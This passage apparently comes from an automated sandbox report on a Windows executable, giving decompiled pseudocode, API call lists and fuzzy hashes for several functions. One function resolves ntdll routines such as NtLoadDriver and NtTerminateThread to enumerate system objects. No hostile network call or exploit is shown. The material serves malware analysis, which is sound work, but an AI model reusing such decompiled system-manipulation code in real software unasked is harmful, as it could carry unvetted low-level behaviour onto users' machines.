				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                                                    0x004068ec
                                                                                                                    0x004068f0
                                                                                                                    0x004068f4
                                                                                                                    0x004068ff
                                                                                                                    0x00406902
                                                                                                                    0x0040690a
                                                                                                                    0x00406910
                                                                                                                    0x00406911
                                                                                                                    0x0040691b
                                                                                                                    0x0040691e
                                                                                                                    0x00406923
                                                                                                                    0x0040692d
                                                                                                                    0x0040692e
                                                                                                                    0x00406933
                                                                                                                    0x0040693d
                                                                                                                    0x00406940
                                                                                                                    0x00406949
                                                                                                                    0x0040694a
                                                                                                                    0x00406950
                                                                                                                    0x00406956
                                                                                                                    0x00406959
                                                                                                                    0x0040695c
                                                                                                                    0x00406964
                                                                                                                    0x0040696d
                                                                                                                    0x00406974
                                                                                                                    0x0040697e
                                                                                                                    0x00406989
                                                                                                                    0x00406990
                                                                                                                    0x00406998
                                                                                                                    0x0040699b
                                                                                                                    0x0040699f
                                                                                                                    0x004069b8
                                                                                                                    0x004069bc
                                                                                                                    0x004069c4
                                                                                                                    0x004069c7
                                                                                                                    0x004069c7
                                                                                                                    0x004069cb
                                                                                                                    0x004069ce
                                                                                                                    0x004069d4
                                                                                                                    0x004069d4
                                                                                                                    0x004069d9
                                                                                                                    0x004069df
                                                                                                                    0x004069e6
                                                                                                                    0x004069ea
                                                                                                                    0x004069ef
                                                                                                                    0x004069f2
                                                                                                                    0x004069f5
                                                                                                                    0x00406a00
                                                                                                                    0x00406a01
                                                                                                                    0x00406a06
                                                                                                                    0x00406a08
                                                                                                                    0x00406a0b
                                                                                                                    0x00406a10
                                                                                                                    0x00406a16
                                                                                                                    0x00406a25
                                                                                                                    0x00406a25
                                                                                                                    0x00406a18
                                                                                                                    0x00406a1e
                                                                                                                    0x00406a1e
                                                                                                                    0x00406a27
                                                                                                                    0x00406a2f
                                                                                                                    0x00406a32
                                                                                                                    0x00406a35
                                                                                                                    0x00406a3b
                                                                                                                    0x00406a41
                                                                                                                    0x00406a47
                                                                                                                    0x00406a4d
                                                                                                                    0x00406a53
                                                                                                                    0x00406a5d
                                                                                                                    0x00406a6d

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                    • memcpy.MSVCRT ref: 0040696D
                                                                                                                    • memcpy.MSVCRT ref: 0040697E
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                      • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                      • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                      • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                      • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                      • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                      • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 975042529-0
                                                                                                                    • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                    • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                    • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                    • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                                                    0x004097b1
                                                                                                                    0x004097b9
                                                                                                                    0x004097bb
                                                                                                                    0x004097be
                                                                                                                    0x004097c3
                                                                                                                    0x004097ca
                                                                                                                    0x004097de
                                                                                                                    0x004097de
                                                                                                                    0x004097e3
                                                                                                                    0x004097e5
                                                                                                                    0x004097e5
                                                                                                                    0x004097ec
                                                                                                                    0x004097f3
                                                                                                                    0x004097f6
                                                                                                                    0x004097fe
                                                                                                                    0x00409802
                                                                                                                    0x00409805
                                                                                                                    0x0040980a
                                                                                                                    0x0040980d
                                                                                                                    0x00409810
                                                                                                                    0x00409822
                                                                                                                    0x00000000
                                                                                                                    0x00409827
                                                                                                                    0x0040982a
                                                                                                                    0x004098da
                                                                                                                    0x004098da
                                                                                                                    0x004098dc
                                                                                                                    0x004098e0
                                                                                                                    0x004098e9
                                                                                                                    0x004098ec
                                                                                                                    0x004098f6
                                                                                                                    0x004098f6
                                                                                                                    0x004098e2
                                                                                                                    0x00000000
                                                                                                                    0x004098e2
                                                                                                                    0x00409830
                                                                                                                    0x00409833
                                                                                                                    0x00409838
                                                                                                                    0x0040983b
                                                                                                                    0x0040983e
                                                                                                                    0x0040985f
                                                                                                                    0x0040985f
                                                                                                                    0x00409861
                                                                                                                    0x00409863
                                                                                                                    0x0040989e
                                                                                                                    0x004098b1
                                                                                                                    0x004098b8
                                                                                                                    0x004098c0
                                                                                                                    0x004098c5
                                                                                                                    0x004098d5
                                                                                                                    0x00409865
                                                                                                                    0x00409865
                                                                                                                    0x00409865
                                                                                                                    0x0040986c
                                                                                                                    0x00409878
                                                                                                                    0x0040987f
                                                                                                                    0x0040988a
                                                                                                                    0x0040988f
                                                                                                                    0x0040988f
                                                                                                                    0x0040986c
                                                                                                                    0x00000000
                                                                                                                    0x00409863
                                                                                                                    0x00409840
                                                                                                                    0x00409843
                                                                                                                    0x00409846
                                                                                                                    0x0040984b
                                                                                                                    0x00409852
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00409854
                                                                                                                    0x0040985d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040985d
                                                                                                                    0x00409894
                                                                                                                    0x00000000
                                                                                                                    0x00409894

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                    • memset.MSVCRT ref: 00409805
                                                                                                                    • memcpy.MSVCRT ref: 0040988A
                                                                                                                    • memcpy.MSVCRT ref: 004098C0
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3641025914-0
                                                                                                                    • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                    • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                    • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                    • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 68%
                                                                                                                    			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                                                    0x004067ac
                                                                                                                    0x004067af
                                                                                                                    0x004067b5
                                                                                                                    0x004067ba
                                                                                                                    0x004067bf
                                                                                                                    0x004067c1
                                                                                                                    0x004067c6
                                                                                                                    0x004067c7
                                                                                                                    0x004067cc
                                                                                                                    0x004067cd
                                                                                                                    0x004067d2
                                                                                                                    0x004067d4
                                                                                                                    0x004067d9
                                                                                                                    0x004067da
                                                                                                                    0x004067df
                                                                                                                    0x004067e0
                                                                                                                    0x004067e5
                                                                                                                    0x004067e7
                                                                                                                    0x004067ec
                                                                                                                    0x004067ed
                                                                                                                    0x004067f2
                                                                                                                    0x004067f3
                                                                                                                    0x004067f8
                                                                                                                    0x004067fa
                                                                                                                    0x004067ff
                                                                                                                    0x00406800
                                                                                                                    0x00406805
                                                                                                                    0x00406806
                                                                                                                    0x00406808
                                                                                                                    0x0040680f
                                                                                                                    0x00406810
                                                                                                                    0x00406812
                                                                                                                    0x00406817
                                                                                                                    0x0040681e
                                                                                                                    0x00406828
                                                                                                                    0x0040682b
                                                                                                                    0x0040682c
                                                                                                                    0x0040681e
                                                                                                                    0x00406835
                                                                                                                    0x00406839
                                                                                                                    0x00406841

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                    • free.MSVCRT(00000000), ref: 00406839
                                                                                                                      • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??3@$free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2241099983-0
                                                                                                                    • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                    • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                    • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                    • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                                                    0x00405d03
                                                                                                                    0x00405d06
                                                                                                                    0x00405d10
                                                                                                                    0x00405d17
                                                                                                                    0x00405d22
                                                                                                                    0x00405d32
                                                                                                                    0x00405d40
                                                                                                                    0x00405d48
                                                                                                                    0x00405d4e
                                                                                                                    0x00405d54
                                                                                                                    0x00405d59
                                                                                                                    0x00405d5c
                                                                                                                    0x00405d61
                                                                                                                    0x00405d67

                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 00405D0A
                                                                                                                    • GetWindowRect.USER32 ref: 00405D17
                                                                                                                    • GetClientRect.USER32 ref: 00405D22
                                                                                                                    • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4247780290-0
                                                                                                                    • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                    • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                    • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                    • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                                                    0x004083dc
                                                                                                                    0x004083e2
                                                                                                                    0x004083e9
                                                                                                                    0x004083ea
                                                                                                                    0x004083eb
                                                                                                                    0x004083f3
                                                                                                                    0x004083f6
                                                                                                                    0x004083f8
                                                                                                                    0x00408401
                                                                                                                    0x00408404
                                                                                                                    0x00408407
                                                                                                                    0x00408409
                                                                                                                    0x0040840c
                                                                                                                    0x00408413
                                                                                                                    0x0040841d
                                                                                                                    0x00408427
                                                                                                                    0x0040842c
                                                                                                                    0x0040842f
                                                                                                                    0x00408432
                                                                                                                    0x00408435
                                                                                                                    0x00408438
                                                                                                                    0x00408439
                                                                                                                    0x0040843e
                                                                                                                    0x0040843f
                                                                                                                    0x00408442
                                                                                                                    0x0040844a

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$??2@??3@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1252195045-0
                                                                                                                    • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                    • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                    • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                    • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                                                    0x00406746
                                                                                                                    0x00406746
                                                                                                                    0x0040674f
                                                                                                                    0x00406751
                                                                                                                    0x00406752
                                                                                                                    0x00406757
                                                                                                                    0x00406758
                                                                                                                    0x0040675d
                                                                                                                    0x0040675f
                                                                                                                    0x00406760
                                                                                                                    0x00406765
                                                                                                                    0x00406766
                                                                                                                    0x0040676e
                                                                                                                    0x00406770
                                                                                                                    0x00406771
                                                                                                                    0x00406776
                                                                                                                    0x00406777
                                                                                                                    0x0040677f
                                                                                                                    0x00406781
                                                                                                                    0x00406785
                                                                                                                    0x00406787
                                                                                                                    0x00406788
                                                                                                                    0x0040678e
                                                                                                                    0x0040678e
                                                                                                                    0x00406790
                                                                                                                    0x00406791
                                                                                                                    0x00406796
                                                                                                                    0x00406798
                                                                                                                    0x0040679e
                                                                                                                    0x004067a1
                                                                                                                    0x004067a4
                                                                                                                    0x004067ab

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??3@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 613200358-0
                                                                                                                    • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                    • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                    • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
